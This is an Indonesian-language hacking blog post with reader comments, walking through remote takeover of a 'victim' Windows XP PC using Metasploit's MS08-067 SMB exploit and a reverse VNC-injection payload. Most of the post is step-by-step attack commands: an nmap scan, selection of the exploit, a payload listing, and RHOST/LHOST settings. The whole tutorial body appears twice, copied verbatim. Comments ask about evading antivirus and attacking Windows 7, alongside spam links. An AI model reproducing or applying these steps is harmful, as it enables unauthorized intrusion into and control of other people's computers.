Pada Tutorial hacking kali ini saya akn jelaskan cara Remote PC dengan Metasploit.
Software ini hanya bisa digunakan untuk mengendalikan komputer or laptop lewat jaringan wireless saja.
persiapan yg di perlukan antara lain:
1.Metasploit versi berapa aj, karena sekarang udah versi 3.3.4 maka kita akan
memakai versi baru tersebut tool ini bisa di download di sini
2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren ),,tp gw pk windows aj..hehe..
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya
4.Ip dari komputer korban (disini gw cb exploit 192.168.1.31)
5.siapin aj apa yg perlu mnurut bro perlu biat gak bosen nunggu,,
pertama install metasploitnya, klo di windows tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya
./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)
klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).
pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc di 1 jaringan,mo pk cain n avbel or netcut jg bisa,,klo gw sih sering make
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya
( simulation on micr*soft windows)
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 484 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r8002 updated today (2009.12.28)
msf >
kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap
nmap -v -O -p445 192.168.1.31
command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya
ketikan di jendela msf(metasploit)
show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan
karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah
dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show payloads
TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager
ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload
windows/vncinject/reverse_tcp
setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp
setelah itu kita set ip dari target
set RHOST 192.168.1.31 -----> komputer korban
set LHOST 192.168.1.37 -----> komputer kita
klo udah selesai kita tinggal launch exploit di msf
tinggal ketik
exploit
Software ini hanya bisa digunakan untuk mengendalikan komputer or laptop lewat jaringan wireless saja.
persiapan yg di perlukan antara lain:
1.Metasploit versi berapa aj, karena sekarang udah versi 3.3.4 maka kita akan
memakai versi baru tersebut tool ini bisa di download di sini
2.Komputer dengan internet karena ini harus ada usahakan dalam satu jaringan
karena kita akan meremote komputer lain, untuk OSnya terserah kita
bisa pake linux, windows, unix ( pke backtrack lebih keren ),,tp gw pk windows aj..hehe..
3.Nmap tapi buat metasploit framework udah terinclude langsung Nmapnya
4.Ip dari komputer korban (disini gw cb exploit 192.168.1.31)
5.siapin aj apa yg perlu mnurut bro perlu biat gak bosen nunggu,,
pertama install metasploitnya, klo di windows tinggal next, next dst tapi klo
di linux kita tinggal download source filenya terus terus kita install ( ini buat
metasplot framework v3.2) klo buat v3.3 kita bisa langsung runn filenya
./framework-3.3-linux-i686.run /opt (kasih perm buat di execute dulu)
klo udah selesai semua, tinggal kita mulai mengexploit PC Korban( kali ini cuma
cuma simulasi ).
pertama kita scan range ip yg ada dalam satu jaringan komputer, terserah make tool apa
aja deh yang penting bisa tau ip pc di 1 jaringan,mo pk cain n avbel or netcut jg bisa,,klo gw sih sering make
angry IP Scanner, di sini kita tidak membtuhkan ip public dari korban kita.
Klo udah selesai kita bisa launch metasploitnya
( simulation on micr*soft windows)
klik metasploit console yg ada di start menu
setelah itu akan muncul jendela metasploit
=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 484 exploits - 225 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r8002 updated today (2009.12.28)
msf >
kayak gini tampilan metasploitnya.
scan komputer korban dengan Nmap
nmap -v -O -p445 192.168.1.31
command di atas untuk mendeteksi OS korban serta port 445 terbuka apa g.
klo udah selesai kita ke jendela metasploitnya
ketikan di jendela msf(metasploit)
show exploits
fungsinya untuk melihat exploit apa saja yang bisa di gunakan
karena pada simulasi ini saya menggunakan exploit
windows/smb/ms08_067_netapi
exploit ini terjadi pada OS XP SP2 ke bawah
dari msf ketik
use windows/smb/ms08_067_netapi
setelah itu maka kita akan masuk ke exploit ini
akan muncul
msf exploit(ms08_067_netapi) >
dari situ ketik lagi
show payloads
TCP Stager
windows/shell/bind_ipv6_tcp Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp Windows Command Shell, Bind TCP Stager
windows/shell/reverse_ipv6_tcp Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports Windows Command Shell, Reverse All-Port TCP Stager
windows/shell_bind_tcp Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
windows/upexec/bind_ipv6_tcp Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_ipv6_tcp Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports Windows Upload/Execute, Reverse All-Port TCP Stager
windows/vncinject/bind_ipv6_tcp VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_ipv6_tcp VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports VNC Server (Reflective Injection), Reverse All-Port TCP Stager
ini merupakan mode apa yang akan kita gunakan untuk masuk ke komputer
korban, di sini kita akan menggunakan payload
windows/vncinject/reverse_tcp
setelah dari situ kita set pada msf untuk menggunakan payload tsb dgn perintah
set PAYLOAD windows/vncinject/reverse_tcp
setelah itu kita set ip dari target
set RHOST 192.168.1.31 -----> komputer korban
set LHOST 192.168.1.37 -----> komputer kita
klo udah selesai kita tinggal launch exploit di msf
tinggal ketik
exploit
Semoga berhasil......
{ 36 komentar... Views All / Send Comment! }
:l:
ga berhasil
kalo untuk SP3 atau Win 7 pake exploitsnya atau payloads nya apa gan..??
coba dulu yah gan .. kunjungi juga http://hyllal-netheroes.blogspot.com/
bang percobaan ane kok kagak berhasil ya....pas waktu exploid itu pasti tidak bisa meneruskan proses.....
wahh klo aktifin antivirusnya gmn om?
ada bacaan, exploit is completed but no session, saya itu karena antivirusnya bagus ?
mohon pncerahaannyan
saya udh brhasil sih, tapi klo yg make antivirus bagus kog ga bisa yah ?? koment lanjutan yang diatas ..
wew
kok ndak bisa bos?
berhasil gan "D
Wah gatot gan
Gak da yang lain ?
Wah gatot gan
Gak da yang lain ?
Wah gatot gan
Gak da yang lain ?
Wah gatot gan
Gak da yang lain ?
Wah gatot gan
Gak da yang lain ?
Wah gatot gan
Gak da yang lain ?
Wah gatot gan
Gak da yang lain ?
Tutor cacat
klo nge exploit windows 7 dengan menggunakan metasploit di windows 7 gmn cara jd menggunakan 2 pc.. topologi LAN..
berhasil mang, thankks
gan, tolong jabarin comand ny donk
<<<<newbe
kok lama ya nungguin selesai starting the metasploit framework console-nya ?
hampir 1,5 jam blm kelar..
Saran : jangan asal hajar gan itu pake payload.. Cari jalurnya dulu biar ga kelamaan n work... Good luck #Djogjakarta Cyber
CARA MENDAPATKAN PENGHASILAN DENGAN MENDAFTAR AGEN 98108
download disini
Terimakasih
tutor copas anjeng
bukannya kita harus menyiapkan sebuah backdoor untuk dapat meremot PC dari jauh ?
Klw exploit win 7 g bsa krena bug nya udh dperbaiku, kecuali klw kta tnam payload di komputer korban
Klw exploit win 7 g bsa krena bug nya udh dperbaiku, kecuali klw kta tnam payload di komputer korban
Klw exploit win 7 g bsa krena bug nya udh dperbaiku, kecuali klw kta tnam payload di komputer korban
pas install ada trojan yg kill antivirus . itu ngaruh apa gx?
www.gootech.cf
Yg belum punya linux bisa diliat di atas install dual boot dengan windows.
NuxLinux.Blogspot.Com » tengkyu gan :D
parah nih clown
semua link udh mati tuh, mending download disni aja all, link nya masi hidup n selalu update.. The Zhemwel
download scripp/source code keren disini gan Bukaaaa
Post a Comment